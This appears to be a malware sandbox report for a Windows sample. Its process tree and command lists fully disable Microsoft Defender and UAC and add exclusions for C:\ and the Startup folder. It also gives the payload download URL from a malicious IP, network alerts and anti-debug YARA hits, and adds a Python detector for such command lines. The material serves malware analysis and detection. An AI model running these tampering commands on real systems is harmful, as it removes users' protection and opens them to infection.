Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | July 6, 2023, 5:01 p.m. | July 6, 2023, 5:04 p.m. |
Process tree

Process | PID | Command line |
---|---|---|
powershell.exe | 2808 | powershell set-mppreference -exclusionpath C:\ |
cmd.exe | 2976 | "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\FFCC.tmp\FFDD.tmp\FFDE.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" |
reg.exe | 3068 | reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f |
reg.exe | 2076 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f |
reg.exe | 2112 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f |
reg.exe | 192 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f |
reg.exe | 2200 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f |
reg.exe | 2228 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f |
reg.exe | 2444 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f |
reg.exe | 2516 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f |
reg.exe | 2664 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f |
reg.exe | 2720 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f |
reg.exe | 2780 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f |
reg.exe | 2892 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f |
reg.exe | 2940 | reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f |
reg.exe | 2656 | reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f |
schtasks.exe | 3008 | schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable |
schtasks.exe | 2056 | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable |
schtasks.exe | 2100 | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable |
schtasks.exe | 2208 | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable |
schtasks.exe | 2952 | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable |
reg.exe | 2788 | reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f |
reg.exe | 2484 | reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f |
reg.exe | 2584 | reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f |
reg.exe | 2760 | reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f |
reg.exe | 2868 | reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f |
reg.exe | 2624 | reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f |
reg.exe | 2708 | reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f |
reg.exe | 1404 | reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f |
powershell.exe | 284 | powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'" |
powershell.exe | 204 | powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force |
powershell.exe | 2268 | powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled" |
powershell.exe | 1892 | powershell.exe -command "Set-MpPreference -PUAProtection disable" |
powershell.exe | 2392 | powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force" |
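The process tree above is a complete Defender-disabling sequence: the policy key is wiped and rewritten with every protection switched off (real-time, behaviour, IOAV and on-access scanning, block-at-first-seen, MAPS reporting and sample submission, PUA detection), the DefenderApiLogger and DefenderAuditLogger ETW sessions are stopped, the Defender maintenance and scan tasks are disabled, the Defender services and drivers are set to Start=4 (disabled), exclusions are added for C:\ and the user's Startup folder, UAC is turned off with EnableLUA=0, and HighThreatDefaultAction is set to 6 (Allow). The Python below is an added detection example, not code from the sandbox report or from the sample: it tokenizes process-creation command lines like those in the tree and maps each one to the control it weakens, so the same sequence can be flagged from Sysmon event 1 or Security event 4688 telemetry. The rule labels, the Finding type and the two benign sample lines are this example's assumptions; the other sample lines are copied from the tree. Two rules (ExclusionProcess/ExclusionExtension and PUAProtection 0) generalize beyond what the trace shows and are marked as such in the comments.

```python
# Added detection example, not part of the sandbox report: map Windows command lines
# like those in the process tree above to the Defender control they weaken. Rule
# labels, the Finding type and the two benign sample lines are assumptions.
import re
from dataclasses import dataclass

TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')
# Policy values under HKLM\Software\Policies\Microsoft\Windows Defender\... and the
# data that switches each protection off; the trace above sets every one of them.
POLICY_DISABLE_VALUES = {
    "disableantivirus": "1", "disablerealtimemonitoring": "1", "disablebehaviormonitoring": "1",
    "disableioavprotection": "1", "disableonaccessprotection": "1", "disablescanonrealtimeenable": "1",
    "disableblockatfirstseen": "1", "disableenhancednotifications": "1",
    "mpenablepus": "0", "spynetreporting": "0", "submitsamplesconsent": "2",
}
DEFENDER_SERVICES = {"windefend", "wdnissvc", "wdfilter", "wdboot", "wdnisdrv"}
DEFENDER_TASKS = ("microsoft\\windows\\windows defender", "microsoft\\windows\\exploitguard")

@dataclass(frozen=True)
class Finding:
    control: str  # which protection is being weakened
    detail: str   # the concrete value, service, task or path involved

def tokenize(cmdline):
    """Split on whitespace, keeping "double-quoted" arguments whole."""
    return [q or u for q, u in TOKEN_RE.findall(cmdline)]

def _reg(tokens):  # reg add <key> /v <name> /t <type> /d <data> /f  |  reg delete <key> /f
    if len(tokens) < 3 or tokens[1].lower() not in ("add", "delete"):
        return None
    key = tokens[2]
    key_l = key.lower()
    leaf = key_l.rsplit("\\", 1)[-1]
    policy = "policies\\microsoft\\windows defender" in key_l
    if tokens[1].lower() == "delete":
        if policy:
            return Finding("Defender policy key removed", key)
        return Finding("Defender shell extension removed", key) if "contextmenuhandlers\\epp" in key_l else None
    opts = {a.lower(): tokens[i + 1] for i, a in enumerate(tokens[3:-1], 3) if a.lower() in ("/v", "/d")}
    name, data = opts.get("/v", "").lower(), opts.get("/d", "")
    if policy and POLICY_DISABLE_VALUES.get(name) == data:
        return Finding("Defender policy disabled", f"{leaf}\\{opts['/v']}={data}")
    if "\\services\\" in key_l and leaf in DEFENDER_SERVICES and (name, data) == ("start", "4"):
        return Finding("Defender service/driver disabled", leaf)  # Start=4 is SERVICE_DISABLED
    if "\\autologger\\" in key_l and leaf.startswith("defender") and (name, data) == ("start", "0"):
        return Finding("Defender ETW autologger disabled", leaf)
    return None

def _schtasks(tokens):  # schtasks /Change /TN <task> /Disable
    low = [t.lower() for t in tokens]
    if not {"/change", "/disable", "/tn"} <= set(low) or low.index("/tn") + 1 >= len(low):
        return None
    task = tokens[low.index("/tn") + 1]
    return Finding("Defender scheduled task disabled", task) if task.lower().startswith(DEFENDER_TASKS) else None

def _powershell(cmd):  # Set-/Add-MpPreference and the EnableLUA write, matched on the raw text
    m = re.search(r"-exclusion(path|process|extension)\s+(.+)$", cmd, re.I)  # process/extension: generalization
    if m and re.search(r"\b(set|add)-mppreference\b", cmd, re.I):
        return Finding(f"Defender exclusion added ({m.group(1).lower()})", m.group(2).strip().strip("'\""))
    if re.search(r"-enablecontrolledfolderaccess\s+disabled\b", cmd, re.I):
        return Finding("Controlled folder access disabled", "EnableControlledFolderAccess=Disabled")
    if re.search(r"-puaprotection\s+(disabled?|0)\b", cmd, re.I):  # 0 / Disabled: generalization
        return Finding("PUA protection disabled", "PUAProtection=Disabled")
    if re.search(r"-highthreatdefaultaction\s+(6|allow)\b", cmd, re.I):  # ThreatAction 6 == Allow
        return Finding("High-severity threats set to Allow", "HighThreatDefaultAction=6")
    if re.search(r"\benablelua\b", cmd, re.I) and re.search(r"-value\s+0\b", cmd, re.I):
        return Finding("UAC disabled", "EnableLUA=0")
    return None

def classify(cmdline):
    """Finding for one command line, or None when no tampering rule matches."""
    tokens = tokenize(cmdline)
    if not tokens:
        return None
    image = re.split(r"[\\/]", tokens[0])[-1].lower()
    image = image[:-4] if image.endswith(".exe") else image
    if image == "cmd":  # cmd /c "<inner>": unwrap and classify the inner command
        m = re.search(r"\s/c\s+", cmdline, re.I)
        if not m:
            return None
        inner = cmdline[m.end():].strip()
        return classify(inner[1:-1] if len(inner) > 1 and inner[0] == inner[-1] == '"' else inner)
    if image == "reg":
        return _reg(tokens)
    if image == "schtasks":
        return _schtasks(tokens)
    return _powershell(cmdline) if image == "powershell" else None

def scan(cmdlines):
    """(command line, Finding) for every line that matches a rule."""
    hits = [(c, classify(c)) for c in cmdlines]
    return [(c, f) for c, f in hits if f is not None]

# Sample input: command lines copied from the process tree above, then two
# constructed benign lines (not from the report) that must not match.
SAMPLE_CMDLINES = [
    r'reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f',
    r'reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f',
    r'reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f',
    r'reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f',
    r'reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f',
    r'schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable',
    'cmd /c powershell set-mppreference -exclusionpath C:\\',
    r'''powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"''',
    r'powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force',
    r'powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"',
    r'reg add "HKLM\Software\Contoso\Agent" /v "Start" /t REG_DWORD /d "4" /f',  # constructed, benign
    r'schtasks /Query /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan"',  # constructed, benign
]
```

classify() unwraps the cmd /c wrapper that appears in the tree, so the C:\ exclusion is flagged the same way whether it is run directly by powershell.exe or through cmd.exe; scan() over a day of 4688/Sysmon command lines returns the ordered list of controls touched, which is what makes this sequence stand out from a lone administrative reg add.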
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 23.137.249.127:80 -> 192.168.56.101:49161 | 2017962 | ET MALWARE PE EXE or DLL Windows file download disguised as ASCII | A Network Trojan was detected |
TCP 23.137.249.127:80 -> 192.168.56.101:49161 | 2022640 | ET MALWARE PE EXE or DLL Windows file download Text M2 | A Network Trojan was detected |
TCP 23.137.249.127:80 -> 192.168.56.101:49161 | 2035769 | ET HUNTING [TW] Likely Hex Executable String | Misc activity |
Suricata TLS
No Suricata TLS
Signatures

Key | Value |
---|---|
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |

Key | Value |
---|---|
suspicious_features | GET method with no useragent header, Connection to IP address |
suspicious_request | GET http://23.137.249.127/efsdff3/frgsrgd/panel/uploads/Iprkfcbtfyj.wav |
request | GET http://23.137.249.127/efsdff3/frgsrgd/panel/uploads/Iprkfcbtfyj.wav |

Key | Value |
---|---|
file | C:\Users\test22\AppData\Local\Temp\FFCC.tmp\FFDD.tmp\FFDE.bat |
file | C:\Users\test22\AppData\Local\Temp\FFCC.tmp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |

Key | Value |
---|---|
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable |
cmdline | "C:\Windows\System32\cmd.exe" /c powershell set-mppreference -exclusionpath C:\ |
cmdline | powershell set-mppreference -exclusionpath C:\ |
cmdline | cmd /c powershell set-mppreference -exclusionpath C:\ |
cmdline | powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled" |
cmdline | powershell.exe -command "Set-MpPreference -PUAProtection disable" |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable |
cmdline | powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force" |
cmdline | "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\FFCC.tmp\FFDD.tmp\FFDE.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" |
cmdline | powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'" |
cmdline | powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force |
cmdline | schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable |

YARA rule | Description |
---|---|
DebuggerCheck__GlobalFlags | (no description) |
DebuggerCheck__QueryInfo | (no description) |
DebuggerHiding__Thread | (no description) |
DebuggerHiding__Active | (no description) |
ThreadControl__Context | (no description) |
SEH__vectored | (no description) |
anti_dbg | Checks if being debugged |
disable_dep | Bypass DEP |

YARA rule | Description |
---|---|
DebuggerCheck__GlobalFlags | (no description) |
DebuggerCheck__QueryInfo | (no description) |
DebuggerHiding__Thread | (no description) |
DebuggerHiding__Active | (no description) |
DebuggerException__SetConsoleCtrl | (no description) |
ThreadControl__Context | (no description) |
SEH__vectored | (no description) |
anti_dbg | Checks if being debugged |
disable_dep | Bypass DEP |

Key | Value |
---|---|
cmdline | reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable |
cmdline | reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f |
cmdline | reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f |
cmdline | C:\Windows\sysnative\cmd /c "C:\Users\test22\AppData\Local\Temp\FFCC.tmp\FFDD.tmp\FFDE.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable |
cmdline | reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f |
cmdline | reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f |
cmdline | reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f |
cmdline | reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f |
cmdline | reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable |
cmdline | reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f |
cmdline | reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f |
cmdline | "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\FFCC.tmp\FFDD.tmp\FFDE.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f |
cmdline | powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'" |
cmdline | reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f |
cmdline | schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable |

Key | Value |
---|---|
host | 23.137.249.127 |
host | 77.88.21.158 |

Key | Value |
---|---|
description | Wllcsochcbi.exe tried to sleep 2728263 seconds, actually delayed analysis time by 2728263 seconds |